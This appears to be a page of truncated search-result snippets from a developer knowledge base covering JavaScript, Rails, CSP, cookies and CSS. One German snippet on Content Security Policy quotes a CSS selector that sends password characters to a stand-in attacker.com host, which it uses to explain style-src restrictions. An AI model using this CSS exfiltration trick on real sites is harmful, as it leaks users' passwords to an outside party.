not matched Info As of 2024, possessive quantifiers are not supported in JavaScript. There's a TC 39 proposal that's stuck in stage...
...a same_site option, i.e. cookies[:my_cookie] = { value: 'my-value', same_site: 'None' } Javascript (using js-cookie) Make sure you're using at least 2.2.0. Set a cookie with...
...contributions to the gem dist/ usually contains files rendered ready for "distribution", e.g. minified Javascript files src/ usually contains the raw "source" files, e.g. split up into many files, before...
...you can use most ES6 features without a build step. Just deliver your plain JavaScript without transpilation through Babel or TypeScript, and modern browsers will run them natively. Features supported...
...Rails with the assets pipeline (sprockets) you are probably using Uglifier to minify your JavaScript. Uglifier can minify some, but not all ES6 language features. Check if you're affected...
...aber die wichtigsten sind: Quellen: default-src: Fallback für alles weitere *-src script-src: JavaScript style-src: CSS font-src: Fonts img-src: Bilder object-src: Quellen für Plugins (z.B...
input[type="password"][value$="a"] { background-image: url("http://attacker.com/passwords-ends-with/a"); } Problem: Manche Javascript-Libraries (Editoren etc) verwenden Inline-Styles. object-src Auch wichtig. Wenn nicht eingeschränkt, können...
...lambda do |request| (request.session.id || SecureRandom.base64(16)).to_s end Then, find all occurences of javascript_include_tag, javascript_tag, javascript_pack_tag etc. and add nonce: true. Also, make sure...
...don't have any other inline scripts in your application that do not use javascript_tag. Why this works The main point of this CSP is to disallow user content...
...prompt will have been closed already and can not be brought back. Also, any JavaScript code placed after the alert will be executed. Automatically closing user prompts happens when performing...
...RegExp to interpret text as Shift JIS encoded which you probably don't want. Javascript There is no modifier to make the dot match line feeds. You need to write...
...proposal that's stuck in Stage 1. While there is a /m modifier in Javascript, it only changes the meaning of ^ and $. Perl You can make the dot match line...
...using a tool like Unpoly you might want to set autocomplete="off" in the JavaScript that also initializes your date picker library: up.compiler('.date-picker', function(input) { input.setAttribute('autocomplete', 'off...
}) This way users with JavaScript disabled (and hence no calendar popups) will still get the browser's default autocomplete behavior...
When using the asset pipeline your assets (images, javascripts, stylesheets, fonts) live in folders inside app: app/assets/fonts app/assets/images app/assets/javascripts app/assets/stylesheets With the asset pipeline, you can use the...
...power of Ruby to generate assets. E.g. you can have ERB tags in your Javascript. Or you can have an ERB template which generates Haml which generates HTML. You can...
...redirect with GET as expected. This is also what Unpoly or the Rails unobtrusive Javascript adapter does when you annotate a link with data-method="PATCH...
...for a multi-line text in your HTML. Earlier, it was necessary to implement JavaScript solutions like Superclamp.js to enable this because the browser support has been rather limited and...
Still, we recommend to use the CSS approach whenever possible, since Clamping in JavaScript has significant performance costs. Usage display: -webkit-box overflow: hidden overflow-wrap: break-word
Jasmine is a great way to unit test your JavaScript components without writing an expensive end-to-end test for every small requirement. After we integrated Jasmine into a Rails...
...your footprint small. Check your JS bundles Webpack(er): Analyze the size of your JavaScript components
...event on window. It will be emitted for all uncaught errors in the current JavaScript VM: window.addEventListener('error', function(event) { console.log("Got an uncaught error: ", event.error) }) Tip Testing tools like...
...concept, like a Ruby class attribute (snake_case) that is also exposed to the JavaScript world (camelCase). # This query matches "foobar", "foo-bar" and "foo_bar" # The query is case...
...a package functionality from window e.g. $(...).datepicker() from your dev console or any other javascript within the application. Background By default yarn will create a folder node_modules that includes...
...to window, to have access to jQuery from our dev console or any other javascript within the application. app/webpack/packs/main.js window.$ = jQuery window.jQuery = jQuery Now this will not allow us to...
...Our primary concern here is users uploading .html or .svg files that can run JavaScript and possibly hijack another user's session. A secondary concern is that malicious users can...
...E.g. console.log("Current string:", string, "Current number:", 12) Your output can have hyperlinks to Javascript objects E.g. console.log("Check out the current %o, it's great", location) Displaying tabular data...
...sometimes your application will explode with an error outside your control. Two examples: A JavaScript library references a source map in its build, but forgets to package the source map...
...leading to validation errors and thus user confusion. We can fix all that with JavaScript: const element = document.querySelector('#your-input') // Number inputs allow incrementing/decrementing with arrow keys, and support exponential...
...jQuery cache even exists. After all jQuery could simply attach event handlers to the Javascript object that represents the DOM element. The reason for the existence of the jQuery cache...
...is that old versions of Internet Explorer could not garbage-collect Javascript objects with circular references. For instance, the following object graph could not be reclaimed by old IE's...
...the required controller actions with @model.nested_model.build. If you are adding fields dynamically by using JavaScript, then the form helper method should take care of this: new_nested_record = f.object.send(nested...
timemachine.js allows you to mock the client's time by monkey-patching into Javascript core classes. We use timemachine.js in combination with the Timecop gem to synchronize the local...
...we see that Timecop is mocking the time: - if defined?(Timecop) && Timecop.top_stack_item = javascript_include_tag "timemachine.js" :javascript timemachine.config({ dateString: #{Time.now.to_json}, tick: true }) Warning timemachine.js will mock the...